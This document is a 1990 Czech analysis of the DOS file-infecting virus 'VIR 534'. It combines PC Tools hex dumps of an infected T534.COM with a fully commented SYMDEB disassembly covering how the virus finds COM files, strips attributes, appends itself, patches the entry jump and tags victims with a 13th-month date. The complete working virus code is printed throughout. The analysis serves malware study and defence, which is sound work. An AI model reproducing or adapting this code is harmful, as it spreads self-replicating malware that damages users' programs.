0064(0040) 07 00 B9 03 00 B4 4E CD 21 E9 04 00 B4 4F CD 21
0080(0050) 73 15 3C 12 74 03 E9 0D 01 83 FD FF 75 03 E9 05
0096(0060) 01 4A BD FF FF EB DB 8B 4F 18 81 E1 E0 01 81 F9
0112(0070) A0 01 74 D8 81 7F 1A 00 FA 77 D1 81 7F 1A 00 01
0128(0080) 72 CA 57 8B F3 83 C6 1E 81 C7 14 00 83 FD FF 75
0144(0090) 03 B0 5C AA AC AA 3C 00 75 FA 5F 8B D7 81 C2 14
0160(00A0) 00 B8 00 43 CD 21 89 8D 22 00 81 E1 FE FF 8B D7
0176(00B0) 81 C2 14 00 B8 01 43 CD 21 8B D7 81 C2 14 00 B8
0192(00C0) 02 3D CD 21 73 03 E9 94 00 8B D8 B8 00 57 CD 21
0208(00D0) 89 8D 24 00 89 95 26 00 B4 3F B9 03 00 8B D7 81
0224(00E0) C2 00 00 CD 21 73 03 E9 5A 00 3D 03 00 75 55 B8
0240(00F0) 02 42 B9 00 00 8B D1 CD 21 2D 03 00 89 85 04 00
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: PCTOOLS/7
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T534.COM Relative sector 0000008, Clust 00011, Disk Abs Sec 0000030
Displacement ----------------- Hex codes-------------------- ASCII value
0256(0100) B9 65 01 83 FA 00 75 3C 8B D7 2B F9 83 C7 02 05
0272(0110) 03 01 03 C1 89 05 B4 40 8B FA 2B D1 B9 16 02 CD
0288(0120) 21 73 03 E9 1E 00 3D 16 02 75 19 B8 00 42 B9 00
0304(0130) 00 8B D1 CD 21 72 0D B4 40 B9 03 00 8B D7 81 C2
0320(0140) 03 00 CD 21 8B 8D 24 00 8B 95 26 00 81 E2 1F FE
0336(0150) 81 CA A0 01 B8 01 57 CD 21 B4 3E CD 21 B8 00 43
0352(0160) 8B 8D 22 00 CD 21 BA 80 00 B4 1A CD 21 58 BF 00
0368(0170) 01 57 C3 0E 1F BA E9 0B 10 5C 3F 3F 3F 3F 3F 3F ??????
0384(0180) 3F 3F 2E 43 4F 4D 00 54 2E 43 4F 4D 00 2E 43 4F ??.COM T.COM CO
0400(0190) 4D 00 4D 00 00 20 00 65 07 21 00 00 00 00 00 01 M M
0416(01A0) 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 03 04 00 00 00 ????????COM
0432(01B0) 00 00 00 00 20 65 07 21 00 0E 10 00 00 54 2E 43 T.C
0448(01C0) 4F 4D 00 20 20 4F 4D 00 00 00 6F 73 6F 66 74 79 OM O Mosofty
0464(01D0) 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66 74 79 right Microsofty
0480(01E0) 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66 74 79 right Microsofty
0496(01F0) 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66 74 79 right Microsofty
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: PCTOOLS/8
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T534.COM Relative sector 0000009, Clust 00011, Disk Abs Sec 0000031
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66 74 79 right Microsofty
0016(0010) 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66 74 20 right Microsoft
0032(0020) 31 39 38 38 00 00 00 00 00 00 00 00 00 00 00 00 1988
0048(0030) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0064(0040) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0080(0050) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0096(0060) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0112(0070) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0128(0080) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0144(0090) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0160(00A0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0176(00B0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0192(00C0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0208(00D0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0224(00E0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0240(00F0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: SYMDEB/1
-----------------
AX=0000 BX=0000 CX=1224 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=156A ES=156A SS=156A CS=156A IP=0100 NV UP EI PL NZ NA PO NC
156A:0100 E90B10 JMP 110E ----------------\
\
156A:0103 0D 01 B4 09 CD-21 B4 4C CD 21 2A|2A 2A i....4.M!4LM!***
156A:0110 2A 2A 2A 2A 2A 2A 2A 2A-2A 2A 2A 2A 2A 2A|2A 2A ****************
: \
: konec programu T.COM -->| |<-- zacatek VIRu_534
156A:1100 2A 2A 2A 2A 2A 2A 2A 2A-2A 2A 2A 2A 2A 24 51 BA *************$Q:
---------------------------------------------------|
156A:1110 73 12 8B D6 81 C6 00 00-FC B9 03 00 BF 00 01 F3 s..V.F..|9..?..s
156A:1120 A4 8B FA B4 30 CD 21 3C-00 75 03 E9 3F 01 BA 2C $.z40M!<.u.i?.:,
156A:1130 00 03 D7 8B DA B4 1A CD-21 BD 00 00 8B D7 81 C2 ..W.Z4.M!=...W.B
156A:1140 07 00 B9 03 00 B4 4E CD-21 E9 04 00 B4 4F CD 21 ..9..4NM!i..4OM!
156A:1150 73 15 3C 12 74 03 E9 0D-01 83 FD FF 75 03 E9 05 s.<.t.i...}.u.i.
156A:1160 01 4A BD FF FF EB DB 8B-4F 18 81 E1 E0 01 81 F9 .J=..k[.O..a`..y
156A:1170 A0 01 74 D8 81 7F 1A 00-FA 77 D1 81 7F 1A 00 01 .tX....zwQ.....
156A:1180 72 CA 57 8B F3 83 C6 1E-81 C7 14 00 83 FD FF 75 rJW.s.F..G...}.u
156A:1190 03 B0 5C AA AC AA 3C 00-75 FA 5F 8B D7 81 C2 14 .0\*,*<.uz_.W.B.
156A:11A0 00 B8 00 43 CD 21 89 8D-22 00 81 E1 FE FF 8B D7 .8.CM!.."..a~..W
156A:11B0 81 C2 14 00 B8 01 43 CD-21 8B D7 81 C2 14 00 B8 .B..8.CM!.W.B..8
156A:11C0 02 3D CD 21 73 03 E9 94-00 8B D8 B8 00 57 CD 21 .=M!s.i...X8.WM!
156A:11D0 89 8D 24 00 89 95 26 00-B4 3F B9 03 00 8B D7 81 ..$...&.4?9...W.
156A:11E0 C2 00 00 CD 21 73 03 E9-5A 00 3D 03 00 75 55 B8 B..M!s.iZ.=..uU8
156A:11F0 02 42 B9 00 00 8B D1 CD-21 2D 03 00 89 85 04 00 .B9...QM!-......
156A:1200 B9 65 01 83 FA 00 75 3C-8B D7 2B F9 83 C7 02 05 9e..z.u<.W+y.G..
156A:1210 03 01 03 C1 89 05 B4 40-8B FA 2B D1 B9 16 02 CD ...A..4@.z+Q9..M
156A:1220 21 73 03 E9 1E 00 3D 16-02 75 19 B8 00 42 B9 00 !s.i..=..u.8.B9.
156A:1230 00 8B D1 CD 21 72 0D B4-40 B9 03 00 8B D7 81 C2 ..QM!r.4@9...W.B
156A:1240 03 00 CD 21 8B 8D 24 00-8B 95 26 00 81 E2 1F FE ..M!..$...&..b.~
156A:1250 81 CA A0 01 B8 01 57 CD-21 B4 3E CD 21 B8 00 43 .J .8.WM!4>M!8.C
156A:1260 8B 8D 22 00 CD 21 BA 80-00 B4 1A CD 21 58 BF 00 ..".M!:..4.M!X?.
156A:1270 01 57 C3 0E 1F BA E9 0B-10 5C 3F 3F 3F 3F 3F 3F .WC..:i..\??????
156A:1280 3F 3F 2E 43 4F 4D 00 54-2E 43 4F 4D 00 2E 43 4F ??.COM.T.COM..CO
156A:1290 4D 00 4D 00 00 20 00 65-07 21 00 00 00 00 00 01 M.M.. .e.!......
156A:12A0 3F 3F 3F 3F 3F 3F 3F 3F-43 4F 4D 03 04 00 00 00 ????????COM.....
156A:12B0 00 00 00 00 20 65 07 21-00 0E 10 00 00 54 2E 43 .... e.!.....T.C
156A:12C0 4F 4D 00 20 20 4F 4D 00-00 00 6F 73 6F 66 74 79 OM. OM...osofty
156A:12D0 72 69 67 68 74 20 4D 69-63 72 6F 73 6F 66 74 79 right Microsofty
156A:12E0 72 69 67 68 74 20 4D 69-63 72 6F 73 6F 66 74 79 right Microsofty
156A:12F0 72 69 67 68 74 20 4D 69-63 72 6F 73 6F 66 74 79 right Microsofty
156A:1300 72 69 67 68 74 20 4D 69-63 72 6F 73 6F 66 74 79 right Microsofty
156A:1310 72 69 67 68 74 20 4D 69-63 72 6F 73 6F 66 74 20 right Microsoft
156A:1320 31 39 38 38
Priloha: SYMDEB/2
-----------------
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;[[ VIR 534 ]]
;[[ 5.5.1990 Ing.Vladim<69>r Mat<61>jka ]]
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;
;Natazeni infikovaneneho programu T534.COM do pameti pocitace, rozbor SYMDEB
AX=0000 BX=0000 CX=1224 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=156A ES=156A SS=156A CS=156A IP=0100 NV UP EI PL NZ NA PO NC
156A:0100 E90B10 JMP 110E ;skok na VIR_534
;------------------------------------------------------------------------------
; PSP - Program Segment Prefix
;Na adrese 0 v programovem segmentu je vytvoren prefix programoveho segmentu.
;------------------------------------------------------------------------------
156A:0000 CD 20 00 A0 00 9A F0 FE-1D F0 8E 09 6B 0C 2B 0A M . ..p~.p..k.+.
156A:0010 6B 0C 56 09 6B 0C 5B 0C-01 01 01 00 02 FF FF FF k.V.k.[.........
156A:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 66 15 80 8F ............f...
156A:0030 6B 0C 14 00 18 00 6A 15-FF FF FF FF 00 00 00 00 k.....j.........
156A:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K..........
156A:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
156A:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
;------------------------------------------------------------------------------
; DTA - Disk Transfer Area
;DTA je adresa zacatku pameti urcene pro diskove operace (cteni, zapis).
;------------------------------------------------------------------------------
156A:0080 00 0D 54 35 33 34-2E 43 4F 4D 00 00 00 00 00 00 . T534.COM......
156A:0090 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
156A:00F0 00 00 00 00 00 00 00 00-00 00 00 EA F1 57 6B 0C ...........jqWk.
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;[[ VIR 534 ]]
;[[ Zacatek infikovaneho programu T534.COM ]]
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;VIR_534 odlozil ze zacatku programu T.COM prvni 3 byte do sveho zapisniku.
;Na toto misto zapsal adresu skoku na vlastni VIR_534, ktery pripojil na konec
;programu T.COM. Po startu infikovaneho programu T534.COM vir nejdrive provede
;opravu prvnich 3 byte programu T.COM. Po realizaci programu viru VIR_534
;spusti vlastni, jiz neporuseny program T.COM.
;
; Struktura infikovaneho programu T534.COM
;
; |=======================================|
; |----JMP VIR_534 | |
; | |--------------| |
; | | |
; | | Puvodni dobry program T.COM |
; | | |
; | | |
; | |=======================================|==|
; |---> | |
; | VIR_534 | |
; | |+534 byte
; |---------------------------------------| |
; | Zapisnik VIRu_534 | |
; | DTA VIRu_534 | |
; |=======================================|==|
;
;------------------------------------------------------------------------------
156A:0100 E90B10 JMP 110E ;skok na VIR_534
;------------------------------------------------------------------------------
; Dale puvodni dobry program T.COM bez zmen.
;------------------------------------------------------------------------------
156A:0103 0D 01 B4 09 CD-21 B4 4C CD 21 2A 2A 2A ***
156A:0110 2A 2A 2A 2A 2A 2A 2A 2A-2A 2A 2A 2A 2A 2A 2A 2A ****************
:
:
156A:1100 2A 2A 2A 2A 2A 2A 2A 2A-2A 2A 2A 2A 2A 24 *************$
;
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;[[ VIR_534 ]]
;[[ Start infitracniho programu VIR_534 ]]
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
;
156A:110E 50 PUSH AX ;ulozit obsah pro vystup
;
;------------------------------------------------------------------------------
; Obnovit puvodni program T.COM - vratit 3 byte na zacatek.
;------------------------------------------------------------------------------
;Po napadeni programu T.COM je v programu VIR_534 za instrukci MOV SI upravena
;offsetova adresa na zacatek zapisniku programu viru. Tato adresa se vypocte
;podle skutecne delky napadeneho programu (v tomto priklade T.COM).
;Oprava se provadi presunem puvodnich 3 byte [CX] ze zapisniku [DS:SI] (0E1FBA)
;na zacatek napadeneho programu CS:0100 [ES:DI], nyni je zde instrukce pro
;skok na zacatek VIRu_534 (E90B10).
156A:110F BE7312 MOV SI,1273 ;zacatek zapisniku VIRu_534
156A:1112 8BD6 MOV DX,SI ;zacatek zapisniku
156A:1114 81C60000 ADD SI,0000 ;od [DS:SI] 156A:1273
156A:1118 FC CLD ;smer prenosu dat
156A:1119 B90300 MOV CX,0003 ;pocet byte
156A:111C BF0001 MOV DI,0100 ;kam [ES:DI] 156A:0100
156A:111F F3 REPZ ;opakuj v delce [CX]
156A:1120 A4 MOVSB ;obnovit program T.COM
156A:1121 8BFA MOV DI,DX ;zacatek zapisniku
;------------------------------------------------------------------------------
; Zjistit verzi DOSu - pro nizsi verzi jak 2.0 - skok na puvodni T.COM.
;------------------------------------------------------------------------------
156A:1123 B430 MOV AH,30 ;funkce zjisti verzi DOSu
156A:1125 CD21 INT 21 ;sluzba DOSu
156A:1127 3C00 CMP AL,00 ;? verze < 2.00
156A:1129 7503 JNZ 112E ;ne - pokracuj
156A:112B E93F01 JMP 126D ;ano - ukoncit VIR_534
;------------------------------------------------------------------------------
; Nastavit novou adresu DTA pro prenosy z disku.
;------------------------------------------------------------------------------
;Implicitni nastaveni adresy DTA je PSP +80H. Pro manipulacni cinnost
;VIRu_534 je tato adresa presmerovana do zapisniku viru na 156A:129F.
156A:112E BA2C00 MOV DX,002C ;pozice DTA v zapisniku
156A:1131 03D7 ADD DX,DI ;zacatek zapisniku VIRu_534
156A:1133 8BDA MOV BX,DX ;[DS:DX] 156A:129F adresa DTA
156A:1135 B41A MOV AH,1A ;funkce nastav adresu DTA
156A:1137 CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Vyhledat pozadovany soubor *.COM.
;------------------------------------------------------------------------------
;V tomto bode zacina manipulacni cinnost VIRu_534.
;Program vyhleda prvni soubor odpovidajici specifikace dle smerniku ASCIIZ
;[DS:DX] (????????.COM00) s pozadovanym atributem [CX] = 0003.
; 03 = 0000 0011
; ||---- soubor jen na cteni RO
; |----- skryty soubor H
;[DS:DX] ukazuje na ASCIIZ retezec ve tvaru "filename.spec00".
;Po vyhledani se napni aktualni oblast DTA +15H (popis v DTA 156A:12B4).
156A:1139 BD0000 MOV BP,0000 ;aktualni adresar
156A:113C 8BD7 MOV DX,DI ;zacatek zapisniku VIRu_534
156A:113E 81C20700 ADD DX,0007 ;[DS:DX] 156A:127A ASCIIZ
156A:1142 B90300 MOV CX,0003 ;atribit souboru
156A:1145 B44E MOV AH,4E ;funkce najdi 1.soubor
156A:1147 CD21 INT 21 ;sluzba DOSu
156A:1149 E90400 JMP 1150 ;vyhodnotit
;------------------------------------------------------------------------------
; Vyhledat dalsi zodpovidajici soubor.
;------------------------------------------------------------------------------
;Tato sluzba najde nasledujici polozku adresare, ktera zodpovida specifikaci
;souboru ASCIIZ [DS:DX] z prvniho volani.
156A:114C B44F MOV AH,4F ;funkce najdi dalsi soubor
156A:114E CD21 INT 21 ;sluzba DOSu
;Pokracuje po vyhledani souboru *.COM , pokud JNB -> nasel
156A:1150 7315 JNB 1167 ;OK nasel - pokracuj
;Rozbor chyby.
156A:1152 3C12 CMP AL,12 ;chyba neplatny pristupovy kod
156A:1154 7403 JZ 1159 ;ano - nastav cestu
156A:1156 E90D01 JMP 1266 ;ne - vystup pri jine chybe
;Pokud neni soubor *.COM nalezen v aktualnim podadresari, je nastavena
;cesta do hlavniho adresare.
156A:1159 83FDFF CMP BP,FFFF ;? hlavni adresar
156A:115C 7503 JNZ 1161 ;ne - nastavit cestu ASCIIZ
156A:115E E90501 JMP 1266 ;ano - vystup
156A:1161 4A DEC DX ;ASCIIZ "\filename.spec00"
156A:1162 BDFFFF MOV BP,FFFF ;hlavni adresar
156A:1165 EBDB JMP 1142 ;opakuj vyhledani
;------------------------------------------------------------------------------
; Kontrola datumu a delky vyhledaneho souboru *.COM.
; Priznak infikovaneho programu 13.mesic !!!
;------------------------------------------------------------------------------
;Program nasel pozadovany soubor *.COM
;Kontroluje se datum vytvoreni a delka vyhledaneho programu. Pokud pozadavky
;nezodpovidaji, vyhleda se dalsi soubor v adresari. [BX] = zacatek DTA.
;Pokud je v datumu vytvoreni souboru nasteven 13.mesic !!! - priznak viru,
;vyhleda se dalsi soubor v adresari.
156A:1167 8B4F18 MOV CX,[BX+18] ;datum vytvoreni souboru
156A:116A 81E1E001 AND CX,01E0 ;maska 0000 0001 1110 0000
; |---r--||-m-||-d--|
156A:116E 81F9A001 CMP CX,01A0 ;? 13.mesic - priznak viru
156A:1172 74D8 JZ 114C ;ano - hledej dalsi soubor
;Pokud delka vyhledaneho souboru je mensi 256 byte nebo je rovna, vetsi
;64000 byte, vyhleda se dalsi soubor v adresari.
156A:1174 817F1A00FA CMP Word Ptr [BX+1A],FA00 ;? delka souboru > 64000
156A:1179 77D1 JA 114C ;ano - hledej dalsi soubor
156A:117B 817F1A0001 CMP Word Ptr [BX+1A],0100 ;? delka souboru < 256
156A:1180 72CA JB 114C ;ano - hledej dalsi soubor
;------------------------------------------------------------------------------
;Presun specifikace a parametru vyhledaneho souboru z DTA do zap. VIRu_534.
;------------------------------------------------------------------------------
;Vyhledan soubor *.COM, splnuje podminky delky programu a neobsahuje
;priznak viru - 13.mesic, splnuje pozadavek na atributy.
156A:1182 57 PUSH DI ;zacatek zapisniku 156A:1273
156A:1183 8BF3 MOV SI,BX ;zacatek DTA 156A:129F
156A:1185 83C61E ADD SI,+1E ;zac.nazvu souboru T.COM v DTA
156A:1188 81C71400 ADD DI,0014 ;zacatek ASCIIZ v zapisniku
156A:118C 83FDFF CMP BP,FFFF ;? hlavni adresar
156A:118F 7503 JNZ 1194 ;ne
;Nastavit specifikaci ASCIIZ v zapisniku ve tvaru "\filename.spec00".
156A:1191 B05C MOV AL,5C ;'\'
156A:1193 AA STOSB ;ulozit '\' do ASCIIZ
;Nastavit specifikaci ASCIIZ v zapisniku ve tvaru "filename.spec00".
156A:1194 AC LODSB ;nacist byte [DS:SI] z DTA
156A:1195 AA STOSB ;ulozit byte [ES:DI] do zapis.
156A:1196 3C00 CMP AL,00 ;? konec ASCIIZ
156A:1198 75FA JNZ 1194 ;ne - presun cely nazev soub.
156A:119A 5F POP DI ;zacatek zapisniku
;------------------------------------------------------------------------------
; Zjistit atributy souboru - zrusit atribut RO.
;------------------------------------------------------------------------------
;Zjistit atributy souboru [CX], [DS:DX] smernik na ASCIIZ ( \filename.spec00 ).
;Atributy odlozit, pozor - po rozsireni VIRu_534 nebudou souboru vraceny!!
156A:119B 8BD7 MOV DX,DI ;zacatek zapisniku 156A:1273
156A:119D 81C21400 ADD DX,0014 ;[DS:DX] smernik na ASCIIZ
156A:11A1 B80043 MOV AX,4300 ;funkce zjisti atributy
156A:11A4 CD21 INT 21 ;sluzba DOSu
156A:11A6 898D2200 MOV [DI+0022],CX ;ulozit atributy souboru
;Zrusit [CX] atribut RO souboru, [DS:DX] smernik na ASCIIZ ( \filename.spec00 )
156A:11AA 81E1FEFF AND CX,FFFE ;zrusit akt. atribut RO
156A:11AE 8BD7 MOV DX,DI ;zacatek zapisniku
156A:11B0 81C21400 ADD DX,0014 ;[DS:DX] smernik na ASCIIZ
156A:11B4 B80143 MOV AX,4301 ;funkce nastav atributy
156A:11B7 CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Otevrit soubor pro cteni a zapis.
;------------------------------------------------------------------------------
;Otevrit soubor pro cteni a zapis. Pokud soubor nelze v tomto rezimu
;otevrit, zustane zrusen atribut RO a vystup pres opaveny T.COM.
156A:11B9 8BD7 MOV DX,DI ;zacatek zapisniku 156A:1273
156A:11BB 81C21400 ADD DX,0014 ;[DS:DX] smernik na ASCIIZ
156A:11BF B8023D MOV AX,3D02 ;funkce otevri soub. pro R/W
156A:11C2 CD21 INT 21 ;sluzba DOSu
156A:11C4 7303 JNB 11C9 ;? ok - [AX] manip. souboru
156A:11C6 E99400 JMP 125D ;error - vystup
;------------------------------------------------------------------------------
; Zjistit cas a datum vytvoreni souboru.
;------------------------------------------------------------------------------
;Cas a datum vytvoreni souboru odlozit do zapisniku. Po infikaci souboru
;bude cas souboru vracen a v datumu bude nastaven priznak viru.
156A:11C9 8BD8 MOV BX,AX ;[BX] manipulator souboru
156A:11CB B80057 MOV AX,5700 ;funkce vrat cas a datum
156A:11CE CD21 INT 21 ;sluzba DOSu
156A:11D0 898D2400 MOV [DI+0024],CX ;odlozit cas souboru
156A:11D4 89952600 MOV [DI+0026],DX ;odlozit datum souboru
;------------------------------------------------------------------------------
; Nacist ze zacatku souboru prvni 3 byte.
;------------------------------------------------------------------------------
;Z otevreneho souboru [BX] - manipulator souboru, nacist prvni 3 byte [CX],
;tyto ulozit do bufferu [DS:DX] - pro obnovu infikovaneho programu.
;Pri chybe vystup pres opraveny program T.COM. V infikovanem souboru nastaven
;priznak VIRu_534 - 13.mesic, zrusen atribut RO.
156A:11D8 B43F MOV AH,3F ;funkce cti ze souboru
156A:11DA B90300 MOV CX,0003 ;pocet byte
156A:11DD 8BD7 MOV DX,DI ;[DS:DX] buffer 156A:1273
156A:11DF 81C20000 ADD DX,0000 ;buffer - zac. zapisniku
156A:11E3 CD21 INT 21 ;sluzba DOSu
156A:11E5 7303 JNB 11EA ;? ok - pokracuj
156A:11E7 E95A00 JMP 1244 ;error - vystup
156A:11EA 3D0300 CMP AX,0003 ;? nactene 3 byte
156A:11ED 7555 JNZ 1244 ;ne - error vystup
;------------------------------------------------------------------------------
; Nastavit smernik na konec souboru, vypocet delky skoku.
;------------------------------------------------------------------------------
;Nastavit smernik na konec souboru. Pri vystupu [DX:AX] nova poloha smerniku.
156A:11EF B80242 MOV AX,4202 ;funkce posun smernik
156A:11F2 B90000 MOV CX,0000 ;[CX:DX] byte od konce souboru
156A:11F5 8BD1 MOV DX,CX
156A:11F7 CD21 INT 21 ;sluzba DOSu
;Vypocet offset adresy skoku na vir.
;V tomto nasem pripade [AX] = 100E - delka programu T.COM.
;Adresa skoku se vypocita z delky programu T.COM - 3 byte (JMP offset VIR_534).
156A:11F9 2D0300 SUB AX,0003 ;offset adresy skoku 100B
156A:11FC 89850400 MOV [DI+0004],AX ;ulozit do zapisniku JMP [AX]
;------------------------------------------------------------------------------
; Zapis VIRu_534 na konec souboru.
;------------------------------------------------------------------------------
;Pri chybe vystup pres opraveny program T.COM. V infikovanem souboru pripojen
;mrtvy VIR_534, nastaven priznak VIRu_534 - 13.mesic, zrusen atribut RO.
;
;Nastavit offset adresu zapisniku VIRu_534 dle skutecne delky infikovaneho
;programu do instrukce MOV SI,offset adresa zapisniku (zacatek).
156A:1200 B96501 MOV CX,0165 ;delka tela viru - po zapisnik
156A:1203 83FA00 CMP DX,+00 ;? nastaven smernik na konec
156A:1206 753C JNZ 1244 ;ne - vystup
;Vypocet pozice offset adresy zapisniku [DI] v instrukci MOV SI,offset adresa.
156A:1208 8BD7 MOV DX,DI ;zacatek zapisniku 156A:1273
156A:120A 2BF9 SUB DI,CX ;- delka tela VIRu_534 CS:110E
156A:120C 83C702 ADD DI,+02 ;156A:1110 - pozice MOV SI,...
; [DI]---->|
;Vypocet offset adresy zacatku zapisniku dle skutecne delky infik. programu.
;Delka (T.COM - 3) + PSP + 3 (JMP vir_534) + telo VIRu_534
; 100B + 100 + 3 + 165 = 1273H
156A:120F 050301 ADD AX,0103 ;100B+103= 110E - zac.VIRu_534
156A:1212 03C1 ADD AX,CX ;110E+165= 1273 + telo
156A:1214 8905 MOV [DI],AX ;offset adresa zap.MOV SI,[AX]
;Zapis VIRu_534 na konec souboru.
156A:1216 B440 MOV AH,40 ;funkce zapis do souboru
156A:1218 8BFA MOV DI,DX ;zacatek zapisniku - odlozit
156A:121A 2BD1 SUB DX,CX ;[DS:DX] buffer - zac.VIRu_534
156A:121C B91602 MOV CX,0216 ;delka celeho VIRu_534
156A:121F CD21 INT 21 ;sluzba DOSu
156A:1221 7303 JNB 1226 ;? ok - pokracuj
156A:1223 E91E00 JMP 1244 ;error - vystup
156A:1226 3D1602 CMP AX,0216 ;? zapsany cely vir
156A:1229 7519 JNZ 1244 ;ne - error vystup
;------------------------------------------------------------------------------
; Nastavit smernik na zacatek souboru.
;------------------------------------------------------------------------------
156A:122B B80042 MOV AX,4200 ;funkce nastav smernik
156A:122E B90000 MOV CX,0000 ;[CX:DX] byte od zac.souboru
156A:1231 8BD1 MOV DX,CX
156A:1233 CD21 INT 21 ;sluzba DOSu
156A:1235 720D JB 1244 ;? error - vystup
;------------------------------------------------------------------------------
; Zapis skoku na VIR_534 na zacatek souboru.
;------------------------------------------------------------------------------
156A:1237 B440 MOV AH,40 ;funkce zapis do souboru
156A:1239 B90300 MOV CX,0003 ;pocet byte
156A:123C 8BD7 MOV DX,DI ;zacatek zapisniku 156A:1273
156A:123E 81C20300 ADD DX,0003 ;buffer- JMP offset.adrs skoku
156A:1242 CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Vratit puvodni cas vytvoreni souboru.
; Nastavit priznak viru - 13.mesic !!!!
;------------------------------------------------------------------------------
;Ze zapisniku VIRu_534 jsou vybrany puvodni hodnoty casu a datumu vytvoreni
;souboru, ktery byl infikovan. Cas je vracen v puvodni hodnote. Hodnota
;datumu je zmenena na 13.mesic, den a rok zustavaji bez zmeny.
156A:1244 8B8D2400 MOV CX,[DI+0024] ;puvodni cas souboru
156A:1248 8B952600 MOV DX,[DI+0026] ;puvodni datum souboru
156A:124C 81E21FFE AND DX,FE1F ;mesic 1111 1110 0001 1111
; |---r--||-m-||-d--|
156A:1250 81CAA001 OR DX,01A0 ;13 ! 0000 0001 1010 0000
156A:1254 B80157 MOV AX,5701 ;funkce vrat cas a datum
156A:1257 CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Uzavrit soubor.
;------------------------------------------------------------------------------
156A:1259 B43E MOV AH,3E ;funkce uzavrit soubor
156A:125B CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Atributy souboru.
;------------------------------------------------------------------------------
;Tato cast programu nema smysl. Pokud by program obsahoval instrukci
;MOV AX,4301 -> budou vraceny puvodni atributy souboru.
156A:125D B80043 MOV AX,4300 ;funkce zjisti atributy
156A:1260 8B8D2200 MOV CX,[DI+0022] ;vybrat puvodni atributy
156A:1264 CD21 INT 21 ;sluzba DOSu
;------------------------------------------------------------------------------
; Nastavit adresu DTA pro prenosy z disku.
;------------------------------------------------------------------------------
;Vratit implicitni nastaveni DTA - offset 80H v PSP
156A:1266 BA8000 MOV DX,0080 ;DS:DX adresa DTA
156A:1269 B41A MOV AH,1A ;sluzba nastav DTA
156A:126B CD21 INT 21 ;funkce DOSu
;------------------------------------------------------------------------------
; Ukoncit cinnost VIRu_534 - start puvodniho programu T.COM
;------------------------------------------------------------------------------
;Vystup z programu VIRu_534 - start puvodniho obnoveneho programu T.COM.
;Na vrchol STACKu je odlozena navratova adresa z RET VIRu_534 (0100).
;Po vykonani instrukce RET program pokracuje od adresy CS:0100 - start
;obnoveneho programu T.COM.
156A:126D 58 POP AX ;obnovit obsah
156A:126E BF0001 MOV DI,0100 ;adresa zacatku T.COM
156A:1271 57 PUSH DI ;odlozit do STACKu
156A:1272 C3 RET ;pokracovat v prog. T.COM
;------------------------------------------------------------------------------
; Struktura zapisniku VIRu_534.
;------------------------------------------------------------------------------
156A:1273 0E1FBA ;+0 puvodni 3 byte T.COM
156A:1276 E90B10 ;+3 JMP offset adresa - skok na vir dle delky
